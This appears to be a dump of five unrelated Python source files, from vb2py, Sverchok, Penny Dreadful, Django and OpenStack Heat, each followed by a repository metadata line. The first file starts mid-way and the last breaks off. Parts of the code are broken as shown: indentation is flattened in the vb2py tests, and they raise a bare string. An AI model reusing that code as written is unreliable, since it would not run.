c="hello"
MyFn = 20
End Function
""")
# simple fn with exit
tests.append("""
Function MyFn()
a=10
n=20
MyFn = 20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.extend(["""
Private Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function""",
"""
Public Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
"""
Friend Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
])
# simple fn with gap in ()
tests.append("""
Function MyFn( )
a=10
n=20
c="hello"
MyFn = 20
End Function
""")
# << Parsing tests >> (43 of 61)
# simple sub
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
Public Function fn(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (44 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function fc(x As Single, y, z As Object, a, b As MyThing.Object, c) As Object.Obj
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y As Variant, z, a As Boolena, b, c As Long) As Variant
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As String
a=10
n=20
c="hello"
End Function
""")
# function returning an array
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single()
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (45 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, Optional b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c) As Integer
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long) As Long
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As Control.Buttons.BigButtons.ThisOne
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (46 of 61)
# ByVal, ByRef args
tests.append("""
Function MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a, y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (47 of 61)
# Simple property let/get/set
tests.extend(["""
Property Let MyProp(NewVal As String)
a = NewVal
Exit Property
End Property
""",
"""
Property Get MyProp() As Long
MyProp = NewVal
Exit Property
End Property
""",
"""
Property Set MyProp(NewObject As Object)
Set MyProp = NewVal
Exit Property
End Property
"""
"""
Public Property Let MyProp(NewVal As String)
a = NewVal
End Property
""",
"""
Public Property Get MyProp() As Long
MyProp = NewVal
End Property
""",
"""
Public Property Set MyProp(NewObject As Object)
Set MyProp = NewVal
End Property
""",
"""
Public Property Get MyProp( ) As Long
MyProp = NewVal
End Property
""",
])
# Simple property let/get/set with labels
tests.extend(["""
1: Property Let MyProp(NewVal As String)
1: a = NewVal
1: End Property
""",
"""
1: Property Get MyProp() As Long
1: MyProp = NewVal
1: End Property
""",
"""
1: Property Set MyProp(NewObject As Object)
1: Set MyProp = NewVal
1: End Property
"""
])
# Simple property let/get/set with labels and comment
tests.extend(["""
1: Property Let MyProp(NewVal As String) ' comment
1: a = NewVal ' comment
1: End Property ' comment
""",
"""
1: Property Get MyProp() As Long ' comment
1: MyProp = NewVal ' comment
1: End Property ' comment
""",
"""
1: Property Set MyProp(NewObject As Object) ' comment
1: Set MyProp = NewVal ' comment
1: End Property ' comment
"""
])
# << Parsing tests >> (48 of 61)
# Simple case
tests.append("""
Select Case x
Case "one"
y = 1
Case "two"
y = 2
Case "three"
z = 3
End Select
""")
# Simple case with else
tests.append("""
Select Case x
Case "one"
y = 1
Case "two"
y = 2
Case "three"
z = 3
Case Else
z = -1
End Select
""")
# Simple case with else and trailing colons
tests.append("""
Select Case x
Case "one":
y = 1
Case "two":
y = 2
Case "three":
z = 3
Case Else:
z = -1
End Select
""")
# Multiple case with else
tests.append("""
Select Case x
Case "one"
y = 1
Case "two"
y = 2
Case "three", "four", "five"
z = 3
Case Else
z = -1
End Select
""")
# Single line case with else
tests.append("""
Select Case x
Case "one": y = 1
Case "two": y = 2
Case "three", "four", "five": z = 3
Case Else: z = -1
End Select
""")
# Range case
tests.append("""
Select Case x
Case "a" To "m"
z = 1
Case "n" To "z"
z = 20
End Select
""")
# Range case with Is and Like
tests.append("""
Select Case x
Case Is < "?", "a" To "m"
z = 1
Case "n" To "z", Is > 10, Is Like "*blah"
z = 20
End Select
""")
# Multiple Range case
tests.append("""
Select Case x
Case "a" To "m", "A" To "G", "K" To "P"
z = 1
Case "n" To "z", 10 To this.that(10,20)
z = 20
End Select
""")
# Empty case
tests.append("""
Select Case a
Case 10
Case 20
End Select
""")
# Case with comments
tests.append("""
Select Case x
' Here is a nasty comment
Case "one"
y = 1
Case "two"
y = 2
Case "three"
z = 3
End Select
""")
# << Parsing tests >> (49 of 61)
# Simple for
tests.append("""
For i = 0 To 1000
a = a + 1
Next i
""")
# Simple for
tests.append("""
For i=0 To 1000
a = a + 1
Next i
""")
# Empty for
tests.append("""
For i = 0 To 1000
Next i
""")
# Simple for with unnamed Next
tests.append("""
For i = 0 To 1000
a = a + 1
Next
""")
# For with step
tests.append("""
For i = 0 To 1000 Step 2
a = a + 1
Next i
""")
# For with exit
tests.append("""
For i = 0 To 1000
a = a + 1
Exit For
Next i
""")
# Nested for
tests.append("""
For i = 0 To 1000
a = a + 1
For j = 1 To i
b = b + j
Next j
Next i
""")
# Dotted names - what does this even mean?
tests.append("""
For me.you = 0 To 1000 Step 2
a = a + 1
Next me.you
""")
# << Parsing tests >> (50 of 61)
# Simple for
tests.append("""
For Each i In coll
a = a + 1
Next i
""")
# Empty for
tests.append("""
For Each i In coll
Next i
""")
# Simple for with unnamed Next
tests.append("""
For Each i In coll
a = a + 1
Next
""")
# For with exit
tests.append("""
For Each i In coll
a = a + 1
Exit For
Next i
""")
# Nested for
tests.append("""
For Each i In coll
a = a + 1
For Each j In coll
b = b + j
Next j
Next i
""")
# << Parsing tests >> (51 of 61)
# Simple while wend
tests.append("""
a = 0
While a < 10
g = 10
a = a + 1
Wend
""")
# Nested while wend
tests.append("""
a = 0
While a < 10
g = 10
a = a + 1
While b < 40
doit
Wend
Wend
""")
# Simple while wend with line numbers
tests.append("""
1: a = 0
2: While a < 10
3: g = 10
4: a = a + 1
5: Wend
""")
# << Parsing tests >> (52 of 61)
# Simple do while loop
tests.append("""
a = 0
Do While a < 10
g = 10
a = a + 1
Loop
""")
# Simple do while with exit
tests.append("""
a = 0
Do While a < 10
g = 10
a = a + 1
Exit Do
Loop
""")
# Nested do while loop
tests.append("""
a = 0
Do While a < 10
g = 10
a = a + 1
Do While b < 40
doit
Loop
Loop
""")
# << Parsing tests >> (53 of 61)
# Simple do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Loop
""")
# Simple do with exit
tests.append("""
a = 0
Do
g = 10
a = a + 1
Exit Do
Loop
""")
# Nested do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Do
doit
Loop
Loop
""")
# << Parsing tests >> (54 of 61)
# Simple do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Loop While a < 10
""")
# Simple do with exit
tests.append("""
a = 0
Do
g = 10
a = a + 1
Exit Do
Loop While a <10
""")
# Nested do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Do
doit
Loop While a <10
Loop While a< 10
""")
# << Parsing tests >> (55 of 61)
# Simple do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Loop Until a < 10
""")
# Simple do with exit
tests.append("""
a = 0
Do
g = 10
a = a + 1
Exit Do
Loop Until a <10
""")
# Nested do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Do
doit
Loop While a <10
Loop Until a< 10
""")
# << Parsing tests >> (56 of 61)
# Simple do loop
tests.append("""
a = 0
Do Until a < 10
g = 10
a = a + 1
Loop
""")
# Simple do with exit
tests.append("""
a = 0
Do Until a <10
g = 10
a = a + 1
Exit Do
Loop
""")
# Nested do loop
tests.append("""
a = 0
Do Until a< 10
g = 10
a = a + 1
Do While a <10
doit
Loop
Loop
""")
# << Parsing tests >> (57 of 61)
# simple type
tests.append("""
Type myType
A As Integer
B As String
C As MyClass.MyType
End Type
""")
# simple type with scope
tests.append("""
Public Type myType
A As Integer
B As String
C As MyClass.MyType
End Type
""")
tests.append("""
Private Type myType
A As Integer
B As String
C As MyClass.MyType
End Type
""")
# With a comment inside
tests.append("""
Private Type myType
A As Integer
B As String
' Here is a comment
C As MyClass.MyType
End Type
""")
# << Parsing tests >> (58 of 61)
# General with with just the structure
tests.append("""
With MyObject
a = 10
End With
""")
# General with with some assignments
tests.append("""
With MyObject
.value = 10
.other = "Hello"
End With
""")
# General with with some assignments and expressions
tests.append("""
With MyObject
.value = .other + 10
.other = "Hello" & .name
End With
""")
# Nested With
tests.append("""
With MyObject
a = 10
With .OtherObject
b = 20
End With
End With
""")
# General with with just the structure and labels
tests.append("""
1: With MyObject
2: a = 10
3: End With
""")
# Empty with
tests.append("""
With MyObject
End With
""")
# << Parsing tests >> (59 of 61)
# Simple header found at the top of most class files
tests.append("""
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
Persistable = 0 'NotPersistable
DataBindingBehavior = 0 'vbNone
DataSourceBehavior = 0 'vbNone
MTSTransactionMode = 0 'NotAnMTSObject
END
""")
# << Parsing tests >> (60 of 61)
# Simple enumeration
tests.append("""
Enum MyEnum
one
two
three
four
five
End Enum
""")
# Scoped enumeration
tests.append("""
Public Enum MyEnum
one
two
three
four
five
End Enum
""")
tests.append("""
Private Enum MyEnum
one
two
three
four
five
End Enum
""")
# Simple enumeration with comments
tests.append("""
Enum MyEnum ' yeah
one ' this
two ' is
three
four ' neat
five
End Enum
""")
# << Parsing tests >> (61 of 61)
failures = [
"If a = 10 Then d = 1 Else If k = 12 Then b = 12",
"If a = 10 Then d = 1 Else If k = 12 Then b = 12 Else g=123",
]
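# Known constructs the parser cannot currently handle; kept for reference only
# (the loop below builds test methods from tests, not from failures).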
# -- end -- << Parsing tests >>
class ParsingTest(TestCase):
"""Holder class which gets built into a whole test case"""
def getTestMethod(vb):
"""Create a test method"""
def testMethod(self):
try:
buildParseTree(vb)
except VBParserError:
raise "Unable to parse ...\n%s" % vb
return testMethod
#
# Add tests to main test class
for idx in range(len(tests)):
setattr(ParsingTest, "test%d" % idx, getTestMethod(tests[idx]))
if __name__ == "__main__":
main()
|
reingart/vb2py
|
vb2py/test/testparser.py
|
Python
|
gpl-3.0
| 41,055
| 0.003898
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import (matrixdef, Matrix_listing, Vector_generate)
class MatrixGenNode(bpy.types.Node, SverchCustomTreeNode):
''' MatrixGenerator '''
bl_idname = 'MatrixGenNode'
bl_label = 'Matrix in'
bl_icon = 'OUTLINER_OB_EMPTY'
def sv_init(self, context):
s = self.inputs.new('VerticesSocket', "Location")
s.use_prop = True
s = self.inputs.new('VerticesSocket', "Scale")
s.use_prop = True
        s.prop = (1, 1, 1)
s = self.inputs.new('VerticesSocket', "Rotation")
s.use_prop = True
s.prop = (0, 0, 1)
self.inputs.new('StringsSocket', "Angle")
self.outputs.new('MatrixSocket', "Matrix")
def process(self):
L,S,R,A = self.inputs
Ma = self.outputs[0]
if not Ma.is_linked:
return
loc = Vector_generate(L.sv_get())
scale = Vector_generate(S.sv_get())
rot = Vector_generate(R.sv_get())
rotA, angle = [[]], [[0.0]]
        # the Angle input accepts either plain angle values or a vector (e.g. a vector difference) to drive the rotation
if A.is_linked:
if A.links[0].from_socket.bl_idname == 'VerticesSocket':
rotA = Vector_generate(A.sv_get())
angle = [[]]
else:
angle = A.sv_get()
rotA = [[]]
max_l = max(len(loc[0]), len(scale[0]), len(rot[0]), len(angle[0]), len(rotA[0]))
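        # build one identity matrix per output item; matrixdef then applies
        # location / scale / rotation to each of them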
orig = []
for l in range(max_l):
M = mathutils.Matrix()
orig.append(M)
matrixes_ = matrixdef(orig, loc, scale, rot, angle, rotA)
matrixes = Matrix_listing(matrixes_)
Ma.sv_set(matrixes)
def register():
bpy.utils.register_class(MatrixGenNode)
def unregister():
bpy.utils.unregister_class(MatrixGenNode)
if __name__ == '__main__':
register()
|
taxpon/sverchok
|
old_nodes/matrix_in.py
|
Python
|
gpl-3.0
| 2,720
| 0.003309
|
import html
import inflect
import titlecase
from flask import url_for
from shared.pd_exception import DoesNotExistException
from .. import APP, importing
from ..data import match
from ..view import View
@APP.route('/match/<int:match_id>/')
def show_match(match_id: int) -> str:
view = Match(match.get_match(match_id))
return view.page()
# pylint: disable=no-self-use,too-many-instance-attributes
class Match(View):
def __init__(self, viewed_match: match.Match) -> None:
super().__init__()
if not viewed_match:
raise DoesNotExistException()
self.match = viewed_match
self.id = viewed_match.id
self.comment = viewed_match.comment
self.format_name = viewed_match.format_name()
self.players_string = ' vs '.join([p.name for p in viewed_match.players])
self.players_string_safe = ' vs '.join([player_link(p.name) for p in viewed_match.players])
self.module_string = ', '.join([m.name for m in viewed_match.modules])
if not viewed_match.games:
self.no_games = True
return
self.game_one = viewed_match.games[0]
self.has_game_two = False
self.has_game_three = False
if len(viewed_match.games) > 1:
self.has_game_two = True
self.game_two = viewed_match.games[1]
if len(viewed_match.games) > 2:
self.has_game_three = True
self.game_three = viewed_match.games[2]
if viewed_match.has_unexpected_third_game is None:
importing.reimport(viewed_match)
self.has_unexpected_third_game = viewed_match.has_unexpected_third_game
if viewed_match.is_tournament is None:
importing.reimport(viewed_match)
self.is_tournament = viewed_match.is_tournament
def og_title(self) -> str:
return self.players_string
def og_url(self) -> str:
return url_for('show_match', match_id=self.id, _external=True)
def og_description(self) -> str:
p = inflect.engine()
fmt = titlecase.titlecase(p.a(self.format_name))
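        # e.g. a format_name of 'modern' gives fmt == 'A Modern' and a
        # description of 'A Modern match.' (illustrative value only)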
description = '{fmt} match.'.format(fmt=fmt)
return description
def player_link(name: str) -> str:
url = url_for('show_person', person=name)
return '<a href="{url}">{name}</a>'.format(url=html.escape(url), name=html.escape(name))
|
PennyDreadfulMTG/Penny-Dreadful-Discord-Bot
|
logsite/views/match_view.py
|
Python
|
gpl-3.0
| 2,353
| 0.002125
|
# -*- coding: utf-8 -*
PROVINCE_CHOICES = (
('AG', 'Agrigento'),
('AL', 'Alessandria'),
('AN', 'Ancona'),
('AO', 'Aosta'),
('AR', 'Arezzo'),
('AP', 'Ascoli Piceno'),
('AT', 'Asti'),
('AV', 'Avellino'),
('BA', 'Bari'),
# ('BT', 'Barletta-Andria-Trani'), # active starting from 2009
('BL', 'Belluno'),
('BN', 'Benevento'),
('BG', 'Bergamo'),
('BI', 'Biella'),
('BO', 'Bologna'),
('BZ', 'Bolzano/Bozen'),
('BS', 'Brescia'),
('BR', 'Brindisi'),
('CA', 'Cagliari'),
('CL', 'Caltanissetta'),
('CB', 'Campobasso'),
('CI', 'Carbonia-Iglesias'),
('CE', 'Caserta'),
('CT', 'Catania'),
('CZ', 'Catanzaro'),
('CH', 'Chieti'),
('CO', 'Como'),
('CS', 'Cosenza'),
('CR', 'Cremona'),
('KR', 'Crotone'),
('CN', 'Cuneo'),
('EN', 'Enna'),
# ('FM', 'Fermo'), # active starting from 2009
('FE', 'Ferrara'),
('FI', 'Firenze'),
('FG', 'Foggia'),
('FC', 'Forlì-Cesena'),
('FR', 'Frosinone'),
('GE', 'Genova'),
('GO', 'Gorizia'),
('GR', 'Grosseto'),
('IM', 'Imperia'),
('IS', 'Isernia'),
('SP', 'La Spezia'),
    ('AQ', u'L’Aquila'),
('LT', 'Latina'),
('LE', 'Lecce'),
('LC', 'Lecco'),
('LI', 'Livorno'),
('LO', 'Lodi'),
('LU', 'Lucca'),
('MC', 'Macerata'),
('MN', 'Mantova'),
('MS', 'Massa-Carrara'),
('MT', 'Matera'),
('VS', 'Medio Campidano'),
('ME', 'Messina'),
('MI', 'Milano'),
('MO', 'Modena'),
# ('MB', 'Monza e Brianza'), # active starting from 2009
('NA', 'Napoli'),
('NO', 'Novara'),
('NU', 'Nuoro'),
('OG', 'Ogliastra'),
('OT', 'Olbia-Tempio'),
('OR', 'Oristano'),
('PD', 'Padova'),
('PA', 'Palermo'),
('PR', 'Parma'),
('PV', 'Pavia'),
('PG', 'Perugia'),
('PU', 'Pesaro e Urbino'),
('PE', 'Pescara'),
('PC', 'Piacenza'),
('PI', 'Pisa'),
('PT', 'Pistoia'),
('PN', 'Pordenone'),
('PZ', 'Potenza'),
('PO', 'Prato'),
('RG', 'Ragusa'),
('RA', 'Ravenna'),
('RC', 'Reggio Calabria'),
('RE', 'Reggio Emilia'),
('RI', 'Rieti'),
    ('RN', 'Rimini'),
('RM', 'Roma'),
('RO', 'Rovigo'),
('SA', 'Salerno'),
('SS', 'Sassari'),
('SV', 'Savona'),
('SI', 'Siena'),
('SR', 'Siracusa'),
('SO', 'Sondrio'),
('TA', 'Taranto'),
('TE', 'Teramo'),
('TR', 'Terni'),
('TO', 'Torino'),
('TP', 'Trapani'),
('TN', 'Trento'),
('TV', 'Treviso'),
('TS', 'Trieste'),
('UD', 'Udine'),
('VA', 'Varese'),
('VE', 'Venezia'),
('VB', 'Verbano Cusio Ossola'),
('VC', 'Vercelli'),
('VR', 'Verona'),
('VV', 'Vibo Valentia'),
('VI', 'Vicenza'),
('VT', 'Viterbo'),
)
|
jonaustin/advisoryscan
|
django/django/contrib/localflavor/it/it_province.py
|
Python
|
mit
| 2,747
| 0.001458
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
from heat.engine import translation
LOG = logging.getLogger(__name__)
class Instance(resource.Resource):
"""OpenStack cloud database instance resource.
Trove is Database as a Service for OpenStack. It's designed to run entirely
on OpenStack, with the goal of allowing users to quickly and easily utilize
the features of a relational or non-relational database without the burden
of handling complex administrative tasks.
"""
support_status = support.SupportStatus(version='2014.1')
TROVE_STATUS = (
ERROR, FAILED, ACTIVE,
) = (
'ERROR', 'FAILED', 'ACTIVE',
)
TROVE_STATUS_REASON = {
FAILED: _('The database instance was created, but heat failed to set '
'up the datastore. If a database instance is in the FAILED '
'state, it should be deleted and a new one should be '
'created.'),
ERROR: _('The last operation for the database instance failed due to '
'an error.'),
}
BAD_STATUSES = (ERROR, FAILED)
PROPERTIES = (
NAME, FLAVOR, SIZE, DATABASES, USERS, AVAILABILITY_ZONE,
RESTORE_POINT, DATASTORE_TYPE, DATASTORE_VERSION, NICS,
REPLICA_OF, REPLICA_COUNT,
) = (
'name', 'flavor', 'size', 'databases', 'users', 'availability_zone',
'restore_point', 'datastore_type', 'datastore_version', 'networks',
'replica_of', 'replica_count'
)
_DATABASE_KEYS = (
DATABASE_CHARACTER_SET, DATABASE_COLLATE, DATABASE_NAME,
) = (
'character_set', 'collate', 'name',
)
_USER_KEYS = (
USER_NAME, USER_PASSWORD, USER_HOST, USER_DATABASES,
) = (
'name', 'password', 'host', 'databases',
)
_NICS_KEYS = (
NET, PORT, V4_FIXED_IP
) = (
'network', 'port', 'fixed_ip'
)
ATTRIBUTES = (
HOSTNAME, HREF,
) = (
'hostname', 'href',
)
properties_schema = {
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of the DB instance to create.'),
update_allowed=True,
constraints=[
constraints.Length(max=255),
]
),
FLAVOR: properties.Schema(
properties.Schema.STRING,
_('Reference to a flavor for creating DB instance.'),
required=True,
update_allowed=True,
constraints=[
constraints.CustomConstraint('trove.flavor')
]
),
DATASTORE_TYPE: properties.Schema(
properties.Schema.STRING,
_("Name of registered datastore type."),
constraints=[
constraints.Length(max=255)
]
),
DATASTORE_VERSION: properties.Schema(
properties.Schema.STRING,
_("Name of the registered datastore version. "
"It must exist for provided datastore type. "
"Defaults to using single active version. "
"If several active versions exist for provided datastore type, "
"explicit value for this parameter must be specified."),
constraints=[constraints.Length(max=255)]
),
SIZE: properties.Schema(
properties.Schema.INTEGER,
_('Database volume size in GB.'),
required=True,
update_allowed=True,
constraints=[
constraints.Range(1, 150),
]
),
NICS: properties.Schema(
properties.Schema.LIST,
_("List of network interfaces to create on instance."),
default=[],
schema=properties.Schema(
properties.Schema.MAP,
schema={
NET: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of the network to attach this NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.network')
]
),
PORT: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of Neutron port to attach this '
'NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.port')
],
),
V4_FIXED_IP: properties.Schema(
properties.Schema.STRING,
_('Fixed IPv4 address for this NIC.'),
constraints=[
constraints.CustomConstraint('ip_addr')
]
),
},
),
),
DATABASES: properties.Schema(
properties.Schema.LIST,
_('List of databases to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
DATABASE_CHARACTER_SET: properties.Schema(
properties.Schema.STRING,
_('Set of symbols and encodings.'),
default='utf8'
),
DATABASE_COLLATE: properties.Schema(
properties.Schema.STRING,
_('Set of rules for comparing characters in a '
'character set.'),
default='utf8_general_ci'
),
DATABASE_NAME: properties.Schema(
properties.Schema.STRING,
_('Specifies database names for creating '
'databases on instance creation.'),
required=True,
constraints=[
constraints.Length(max=64),
constraints.AllowedPattern(r'[a-zA-Z0-9_\-]+'
r'[a-zA-Z0-9_@?#\s\-]*'
r'[a-zA-Z0-9_\-]+'),
]
),
},
)
),
USERS: properties.Schema(
properties.Schema.LIST,
_('List of users to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
USER_NAME: properties.Schema(
properties.Schema.STRING,
_('User name to create a user on instance '
'creation.'),
required=True,
update_allowed=True,
constraints=[
constraints.Length(max=16),
constraints.AllowedPattern(r'[a-zA-Z0-9_]+'
r'[a-zA-Z0-9_@?#\s]*'
r'[a-zA-Z0-9_]+'),
]
),
USER_PASSWORD: properties.Schema(
properties.Schema.STRING,
_('Password for those users on instance '
'creation.'),
required=True,
update_allowed=True,
constraints=[
constraints.AllowedPattern(r'[a-zA-Z0-9_]+'
r'[a-zA-Z0-9_@?#\s]*'
r'[a-zA-Z0-9_]+'),
]
),
USER_HOST: properties.Schema(
properties.Schema.STRING,
_('The host from which a user is allowed to '
'connect to the database.'),
default='%',
update_allowed=True
),
USER_DATABASES: properties.Schema(
properties.Schema.LIST,
_('Names of databases that those users can '
'access on instance creation.'),
schema=properties.Schema(
properties.Schema.STRING,
),
required=True,
update_allowed=True,
constraints=[
constraints.Length(min=1),
]
),
},
)
),
AVAILABILITY_ZONE: properties.Schema(
properties.Schema.STRING,
_('Name of the availability zone for DB instance.')
),
RESTORE_POINT: properties.Schema(
properties.Schema.STRING,
_('DB instance restore point.')
),
REPLICA_OF: properties.Schema(
properties.Schema.STRING,
_('Identifier of the source instance to replicate.'),
support_status=support.SupportStatus(version='5.0.0')
),
REPLICA_COUNT: properties.Schema(
properties.Schema.INTEGER,
_('The number of replicas to be created.'),
support_status=support.SupportStatus(version='5.0.0')
),
}
attributes_schema = {
HOSTNAME: attributes.Schema(
_("Hostname of the instance."),
type=attributes.Schema.STRING
),
HREF: attributes.Schema(
_("Api endpoint reference of the instance."),
type=attributes.Schema.STRING
),
}
default_client_name = 'trove'
entity = 'instances'
def translation_rules(self, properties):
return [
translation.TranslationRule(
properties,
translation.TranslationRule.RESOLVE,
[self.FLAVOR],
client_plugin=self.client_plugin(),
finder='find_flavor_by_name_or_id'
)
]
def __init__(self, name, json_snippet, stack):
super(Instance, self).__init__(name, json_snippet, stack)
self._href = None
self._dbinstance = None
@property
def dbinstance(self):
"""Get the trove dbinstance."""
if not self._dbinstance and self.resource_id:
self._dbinstance = self.client().instances.get(self.resource_id)
return self._dbinstance
def _dbinstance_name(self):
name = self.properties[self.NAME]
if name:
return name
return self.physical_resource_name()
def handle_create(self):
"""Create cloud database instance."""
self.flavor = self.properties[self.FLAVOR]
self.volume = {'size': self.properties[self.SIZE]}
self.databases = self.properties[self.DATABASES]
self.users = self.properties[self.USERS]
restore_point = self.properties[self.RESTORE_POINT]
if restore_point:
restore_point = {"backupRef": restore_point}
zone = self.properties[self.AVAILABILITY_ZONE]
self.datastore_type = self.properties[self.DATASTORE_TYPE]
self.datastore_version = self.properties[self.DATASTORE_VERSION]
replica_of = self.properties[self.REPLICA_OF]
replica_count = self.properties[self.REPLICA_COUNT]
# convert user databases to format required for troveclient.
# that is, list of database dictionaries
for user in self.users:
dbs = [{'name': db} for db in user.get(self.USER_DATABASES, [])]
user[self.USER_DATABASES] = dbs
# convert networks to format required by troveclient
nics = []
for nic in self.properties[self.NICS]:
nic_dict = {}
net = nic.get(self.NET)
port = nic.get(self.PORT)
if net or port:
neutron = self.client_plugin('neutron')
if net:
net_id = neutron.find_resourceid_by_name_or_id(
neutron.RES_TYPE_NETWORK,
net)
nic_dict['net-id'] = net_id
if port:
port_id = neutron.find_resourceid_by_name_or_id(
neutron.RES_TYPE_PORT,
port)
nic_dict['port-id'] = port_id
ip = nic.get(self.V4_FIXED_IP)
if ip:
nic_dict['v4-fixed-ip'] = ip
nics.append(nic_dict)
# create DB instance
instance = self.client().instances.create(
self._dbinstance_name(),
self.flavor,
volume=self.volume,
databases=self.databases,
users=self.users,
restorePoint=restore_point,
availability_zone=zone,
datastore=self.datastore_type,
datastore_version=self.datastore_version,
nics=nics,
replica_of=replica_of,
replica_count=replica_count)
self.resource_id_set(instance.id)
return instance.id
def _refresh_instance(self, instance_id):
try:
instance = self.client().instances.get(instance_id)
return instance
except Exception as exc:
if self.client_plugin().is_over_limit(exc):
LOG.warning("Stack %(name)s (%(id)s) received an "
"OverLimit response during instance.get():"
" %(exception)s",
{'name': self.stack.name,
'id': self.stack.id,
'exception': exc})
return None
else:
raise
def check_create_complete(self, instance_id):
"""Check if cloud DB instance creation is complete."""
instance = self._refresh_instance(instance_id) # refresh attributes
if instance is None:
return False
if instance.status in self.BAD_STATUSES:
raise exception.ResourceInError(
resource_status=instance.status,
status_reason=self.TROVE_STATUS_REASON.get(instance.status,
_("Unknown")))
if instance.status != self.ACTIVE:
return False
LOG.info("Database instance %(database)s created "
"(flavor:%(flavor)s, volume:%(volume)s, "
"datastore:%(datastore_type)s, "
"datastore_version:%(datastore_version)s)",
{'database': self._dbinstance_name(),
'flavor': self.flavor,
'volume': self.volume,
'datastore_type': self.datastore_type,
'datastore_version': self.datastore_version})
return True
def handle_check(self):
instance = self.client().instances.get(self.resource_id)
status = instance.status
checks = [
{'attr': 'status', 'expected': self.ACTIVE, 'current': status},
]
self._verify_check_conditions(checks)
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
updates = {}
if prop_diff:
instance = self.client().instances.get(self.resource_id)
if self.NAME in prop_diff:
updates.update({self.NAME: prop_diff[self.NAME]})
if self.FLAVOR in prop_diff:
flv = prop_diff[self.FLAVOR]
updates.update({self.FLAVOR: flv})
if self.SIZE in prop_diff:
updates.update({self.SIZE: prop_diff[self.SIZE]})
if self.DATABASES in prop_diff:
current = [d.name
for d in self.client().databases.list(instance)]
desired = [d[self.DATABASE_NAME]
for d in prop_diff[self.DATABASES]]
for db in prop_diff[self.DATABASES]:
dbname = db[self.DATABASE_NAME]
if dbname not in current:
db['ACTION'] = self.CREATE
for dbname in current:
if dbname not in desired:
deleted = {self.DATABASE_NAME: dbname,
'ACTION': self.DELETE}
prop_diff[self.DATABASES].append(deleted)
updates.update({self.DATABASES: prop_diff[self.DATABASES]})
if self.USERS in prop_diff:
current = [u.name
for u in self.client().users.list(instance)]
desired = [u[self.USER_NAME] for u in prop_diff[self.USERS]]
